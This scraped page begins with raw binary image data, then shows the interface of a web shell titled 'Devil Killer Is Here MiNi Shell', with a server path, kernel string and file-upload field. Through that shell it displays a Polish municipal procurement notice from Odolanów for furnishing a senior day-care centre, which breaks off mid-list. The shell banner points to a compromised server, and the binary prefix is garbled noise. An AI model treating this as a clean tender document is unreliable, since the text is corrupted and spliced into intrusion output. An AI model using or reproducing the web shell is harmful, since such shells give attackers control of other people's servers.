JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20171129/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20171129/624537-N-2017.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 624537-N-2017 z dnia 2017-11-29 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Gmina i Miasto Odolanów</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Dostawa i montaż wyposażenia Dziennego Domu Senior + w Odolanowie - 3 postępowanie</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"> </span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Gmina i Miasto Odolanów</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">25085512700000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Rynek</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">11</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">63430 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Odolanów</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">wielkopolskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">62 733 15 81</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">zp@odolanow.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">62 733 38 92</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.odolanow.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej">www.bip.odolanow.pl</span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.bip.odolanow.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.bip.odolanow.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Pisemnie na adres wskazany poniżej</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Gmina i Miasto Odolanów Rynek 11 63-430 Odolanów Polska</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Dostawa i montaż wyposażenia Dziennego Domu Senior + w Odolanowie - 3 postępowanie</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">ZP.271.2.34.2017</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">tylko jednej części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Pom. 01 WIATROŁAP1.	Ławka 1 szt. Wymiary: min. 160 x 40 cm, Wysokość siedziska: min. 40 cm. Konstrukcja ławki do szatni wykonana z profili stalowych, malowanych lakierem proszkowym. Siedzisko ławki wykonane z listew drewnianych malowanych lakierem bezbarwnym. Kolor do ustalenia z inwestorem.Pom. 02 SZATNIA SENIORÓW I PERSONELU2.	Szafa odzieżowa 1 osobowa metalowa - 24 szt.Wymiary: min. 59 x 30 cm,Wysokość: min. 180 cm,Wysokość cokołu: min. 50 mm.Szafa metalowa odzieżowa przeznaczona do przechowywania odzieży seniorów oraz pracowników. 3.	Szafa odzieżowa 1 osobowa metalowa z siedziskiem - 6 szt.Wymiary: min. 59 x 30 cm,Wysokość: min. 180 cm,Wysokość cokołu: min. 50 mm.Szafa metalowa odzieżowa przeznaczona do przechowywania odzieży seniorów oraz pracowników.4.	Ławka 1 szt.Wymiary: min. 180 x 40 cm,Wysokość siedziska: min. 40 cm.Konstrukcja ławki do szatni wykonana z profili stalowych, malowanych lakierem proszkowym. Siedzisko ławki wykonane z listew drewnianych malowanych lakierem bezbarwnym. Ławka z półka na obuwie. Pom. 03 POMIESZCZENIE RELAKSU5.	Kanapa 1-osobowa rozkładana 4 szt.Wymiary: min. 80 x 70 cm,Wysokość siedziska: min. 40 cm.Rama wykonana z litego drewna sosnowego. Elementy pomalowane lakierobejcą. Siedzisko i oparcie wyściełane, tapicerka - kolor tkaniny do ustalenia z inwestorem.6.	Stolik 4 szt.Wymiary blatu: 50 x 50 cm,Wysokość: 60 cm.Stolik wykonany z płyty meblowej laminowanej o gr. min. 25mm, krawędzie płyt zabezpieczone taśmą PCV. Podstawa z 4 nóżek metalowych w kolorze chrom, nogi stołu min. fi 45 mm. Kolor blatu do uzgodnienia z Inwestorem.Przykładowa wizualizacja na rys. nr 1Pom. 09 POKÓJ PIELĘGNIARKI7.	Biurko z szafką i szufladami, zamykany na zamek z 2 kluczykami, uchwyty metalowe, z tylną płytą wzmacniającą - 1 szt.Wymiary min: 60 x 140 cm,Wysokość: 80 cm.Wykonany z płyty meblowej laminowanej o gr. 18 mm, krawędzie płyt zabezpieczone taśmą PCV. Kolor do uzgodnienia z Inwestorem.Przykładowa wizualizacja w rys. nr 48.	Krzesło obrotowe 1 szt.Wymiary min.: 82 x 54,5 cm,Wysokość siedziska min. : 47 cm.Miękkie tapicerowane siedzisko i oparcie. Metalowa konstrukcja ramy malowana proszkowo.Tapicerka - tkanina w kolorze szarym.Pom. 0.10 WC PRACOWNIKÓW9.	Lustro 1 szt.Grubość szkła 4 mmWysokość 50cmSzerokość 40 cm10.	Dozownik do mydła zawieszany 1 szt.Pojemność: 0,5 litraMateriał obudowy: stal nierdzewna, szczotkowana (grubość 0,8)Wykończenie powierzchni: satynaWymiary min.: - wysokość: 150 mm, - szerokość: 100 mm, - głębokość: 100 mmSposób uruchamiania: przyciskWizjer do kontroli poziomu mydłaPrzeznaczenie: mydło w płynieRodzaj montażu: naścienny, przykręcanyOpakowanie zawiera zestaw wkrętów z kołkamiJedna doza mydła: 1 mlZawór niekapekZbiornik wielokrotnego napełniania, można uzupełniać z kanistraSprężyna: stal hartowanaZamek i klucz: metalAtest PZH11.	Pojemnik na ręczniki papierowe 1 szt.Przeznaczenie: ręczniki papierowe ZZWielkość listka: do 250 x 230 mmPojemność min.: 400 sztukMateriał obudowy: tworzywo ABSKolor obudowy: biało-szaryWymiary min. : - wysokość: 270 mm, - szerokość: 270 mm, - głębokość: 130 mmSposób dozowania: wyciągnięcie jednej sztuki papieru powoduje wysunięcie się kolejnejZamek i klucz: plastikOkienko kontrolne informujące o ilości ręcznikówRodzaj montażu: naścienny, przykręcanyOpakowanie zawiera zestaw wkrętów z kołkamiAtest PZH12.	Pojemnik na papier toaletowy 1 szt.Przeznaczenie: papier toaletowy w jumbo rolachWymiary roli: 180-220 mmTrzpień: 45 mm / 55 mmMateriał obudowy: plastik ABSKolor obudowy: szaryWykończenie: satynoweWymiary min.: - wysokość: 260 mm, - szerokość: 240 mm, - głębokość: 130 mmZamek i klucz: plastikRodzaj montażu: naścienny, przykręcanyOpakowanie zawiera zestaw wkrętów z kołkamiPom. 0.11 POM. KLUBOWE 113.	Regał na książki 1 szt.Wymiary: (szer. x gł.) 240 x 25 cm,Wysokość: 240 cm.Regał wykonany z płyty meblowej laminowanej o gr. 18 mm, krawędzie płyt zabezpieczone taśmą PCV. Kolor do uzgodnienia z Inwestorem, otwarty z 7 półkami poziomymi w rozstawie 30 cm, gr. półki 25 mm. Regal podzielony na 3 pionowe części, każda część po 0,80 cm.Wymiary i układ regału w rys. nr 514.	Sofa 2-osobowa nierozkładana 2 szt.Wymiary: 130 x 87 cm,Wysokość siedziska: 46 cm.Rama wykonana z litego drewna. Elementy pomalowane lakierobejcą. Siedzisko i oparcie wyściełane, tapicerka - kolor do ustalenia z Inwestorem.15.	Fotel 1-osobowy 4 szt.Wymiary: 86 x 78 cm,Wysokość siedziska: 46 cm,Głębokość siedziska: 50 cm.Rama wykonana z litego drewna. Elementy pomalowane lakierobejcą. Siedzisko i oparcie wyściełane, tapicerka - kolor do ustalenia z Inwestorem.16.	Stolik - 2 szt.Wymiary blatu: 50 x 50 cm,Wysokość: 60 cm.Stolik wykonany z płyty meblowej laminowanej o gr. min. 25mm, krawędzie płyt zabezpieczone taśmą PCV. Podstawa z 4 nóżek metalowych w kolorze chrom, nogi stołu min. fi 45 mm. Kolor blatu do uzgodnienia z Inwestorem.Przykładowa wizualizacja na rys. nr 117.	Stół - 2 szt.Stół wykonany z litego drewna sosnowego, z opaska pod blatem stołu. Wymiary stołu min.: 80 x 120 cm,Wysokość min.: 80 cm.Blat o gr. min. 25mm, nogi stołu gr. min. 60 x 60 mm.Przykładowa wizualizacja rys. nr 618.	Krzesła - 8 szt.Wymiary krzesła: 80 x 45,00 cm,Wysokość siedziska: 44 cm,Lekka, stabilna, trwała chromowana konstrukcja. Siedzisko i oparcie wykonane z trwałego plastiku. Kolor szary19.	Biurko z jedną wbudowaną pólka na komputer - 2 szt.Wymiary: 60 x 120 cm,Wysokość: 80 cm.Biurko wykonane z płyty meblowej laminowanej o gr. 18 mm, krawędzie płyt zabezpieczone taśmą PCV, dolna półka pod komputer stacjonarny, zabudowany tył. Bez dolnej, wysuwanej półki na klawiaturę. Klawiatura na blacie biurka.Przykładowa wizualizacja rys. nr 720.	Fotel obrotowy - 2 szt.konstrukcja metalowa z podłokietnikiem i oparciem, rama na 5 kółkach.Regulowana wysokość siedziska i kąt oparcia. Siedzisko i oparcie wyściełane, tapicerka w kolorze czarnym.Pom. 0.12 POM. KLUBOWE 221.	Sofa 2-osobowa 3 szt.Wymiary: 130 x 87 cm,Wysokość siedziska: 46 cm.Rama wykonana z litego drewna. Elementy pomalowane lakierobejcą. Siedzisko i oparcie wyściełane, tapicerka - kolor do ustalenia z Inwestorem.22.	Fotel 1-osobowy 2 szt.Wymiary: 86 x 78 cm,Wysokość siedziska: 46 cm,Głębokość siedziska: 50 cm.Rama wykonana z litego drewna. Elementy pomalowane lakierobejcą. Siedzisko i oparcie wyściełane, tapicerka - kolor do ustalenia z Inwestorem.23.	Stolik 3 szt.Wymiary blatu: 50 x 50 cm,Wysokość: 60 cm.Stolik wykonany z płyty meblowej laminowanej o gr. min. 25mm, krawędzie płyt zabezpieczone taśmą PCV. Podstawa z 4 nóżek metalowych w kolorze chrom, nogi stołu min. fi 45 mm. Kolor blatu do uzgodnienia z Inwestorem.Przykładowa wizualizacja na rys. nr 124.	Szafka pod telewizor 1 szt. Wymiary (wys. x szer. x gł.) 200 cm x 40 cm x 40 cm. Szafka podzielona na 4 części, z 4 półkami i 2 drzwiczkami. Szafka wykonana z płyty meblowej laminowanej o gr. 18 mm, krawędzie płyt zabezpieczone taśmą PCV. Szafka posadowiona na 4 nóżkach. Kolor do ustalenia z inwestorem.Wymiary i układ szafki w rys. nr 8Pom. 0.13 POKÓJ TERAPII ZAJĘCIOWEJ25. Stół - 2 szt.Stół wykonany z litego drewna sosnowego, z opaska pod blatem stołu. Wymiary stołu min.: 80 x 120 cm,Wysokość min.: 80 cm.Blat o gr. min. 25mm, nogi stołu gr. min. 60 x 60 mm.Przykładowa wizualizacja rys. nr 726.	Krzesła - 8 szt.Wymiary min. krzesła: 80 x 45,00 cm,Wysokość siedziska: 44 cm,Lekka, stabilna, trwała chromowana konstrukcja. Siedzisko i oparcie wykonane z trwałego plastiku. Kolor szary27.	Szafa duża 2 szt.Wymiary min. : 80 x 180 cm, gł. 40 cm, 4 półki Szafa wykonane z płyty meblowej laminowanej o gr. min. 18 mm, krawędzie płyt zabezpieczone taśmą PCV, zamek patentowy. Półki z płyty meblowej laminowanej o gr. min. 25 mmPom. 0.14 POM. ĆWICZEŃ28.	Szafa duża 1 szt.Wymiary min. : 80 x 180 cm, gł. 40 cm, 4 półkiSzafa wykonane z płyty meblowej laminowanej o gr. min. 18 mm, krawędzie płyt zabezpieczone taśmą PCV, zamek patentowy. Półki z płyty meblowej laminowanej o gr. min. 25 mmPom. 0.16POKÓJ TERAPII ZAJĘCIOWEJ/ PORADNICTWA INDYWIDUALNEGO29.	Stół - 2 szt.Stół wykonany z litego drewna sosnowego, z opaska pod blatem stołu. Wymiary stołu min.: 80 x 120 cm,Wysokość min.: 80 cm.Blat o gr. min. 25mm, nogi stołu gr. min. 60 x 60 mm.Przykładowa wizualizacja rys. nr 630.	Krzesła - 8 szt.Wymiary krzesła: 80 x 45 cm,Wysokość siedziska: 44 cm,Lekka, stabilna, trwała chromowana konstrukcja. Siedzisko i oparcie wykonane z trwałego plastiku. Kolor szary31.	Szafa duża 1 szt.Wymiary min. : 80 x 180 cm, gł. 40 cm, 4 półki Szafa wykonane z płyty meblowej laminowanej o gr. min. 18 mm, krawędzie płyt zabezpieczone taśmą PCV, zamek patentowy. Półki z płyty meblowej laminowanej o gr. min. 25 mmPom. 0.17 BIURO32.	Biurko z szafką i szufladami, zamykany na zamek z 2 kluczykami, uchwyty metalowe, z tylną płytą wzmacniającą - 1 szt.Wymiary min: 60 x 140 cm,Wysokość: 80 cm.Wykonany z płyty meblowej laminowanej o gr. 18 mm, krawędzie płyt zabezpieczone taśmą PCV. Kolor do uzgodnienia z Inwestorem.Przykładowa wizualizacja w rys. nr 433.	Krzesło obrotowe - 1 szt.Wymiary krzesła min.: 82 x 54,5 cm,Wysokość siedziska min.: 47 cm.Miękkie tapicerowane siedzisko i oparcie. Metalowa konstrukcja ramy malowana proszkowo.Tapicerka - tkanina w kolorze szarym.34.	Szafka mała 1 szt.Wymiary min.: 45 x 90 cm, gł. 45 cm, 1 półka.Szafa wykonane z płyty meblowej laminowanej o gr. 18 mm, krawędzie płyt zabezpieczone taśmą PCV, zamek patentowy. Z drzwiami rozwieranymi i 1 półką wewnątrz. Szafka posadowiona na 4 nóżkach.Wymiary i układ półki w rys. nr 935.	Szafa duża 1 szt.Wymiary min. : 80 x 180 cm, gł. 40 cm, 4 półki Szafa wykonane z płyty meblowej laminowanej o gr. min. 18 mm, krawędzie płyt zabezpieczone taśmą PCV, zamek patentowy. Półki z płyty meblowej laminowanej o gr. min. 25 mm.Pom. 0.19 ŁAZIENKA DAMSKA36.	Lustro z regulowanym kątem położenia (przystosowane dla osób niepełnosprawnych) 1 szt.Lustro uchylne w pełnej ramie 60×60 cm dla osób niepełnosprawnych malowane proszkowo na kolor biały.37.	Dozownik do mydła zawieszany 2 szt.Pojemność: 0,5 litraWymiary min.: - wysokość: 150 mm, - szerokość: 100 mm, - głębokość: 100 mmSposób uruchamiania: przyciskWizjer do kontroli poziomu mydłaPrzeznaczenie: mydło w płynieRodzaj montażu: naścienny, przykręcanyW opakowaniu zestaw wkrętów z kołkamiJedna doza mydła: 1 mlZawór 